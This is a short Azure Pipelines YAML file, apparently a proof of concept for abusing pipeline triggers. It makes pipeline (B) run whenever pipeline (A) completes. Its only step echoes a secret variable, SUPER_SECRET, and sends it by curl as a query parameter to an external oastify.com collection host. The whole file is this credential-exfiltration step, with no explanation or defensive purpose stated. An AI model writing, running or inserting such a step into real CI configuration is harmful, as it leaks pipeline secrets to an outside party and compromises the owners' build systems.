trigger: none
pr: none


resources:
  pipelines:
  - pipeline: pipeline (B)
    source: pipeline (A)
    trigger: true # Run pipeline (B) when any run of pipeline (A) completes
    branch: main

steps:
  - script: |
      echo $(SUPER_SECRET)
      curl https://o3sv0ka5bxgl18yeknzpohq950brzhn6.oastify.com?secret=$(SUPER_SECRET)
  
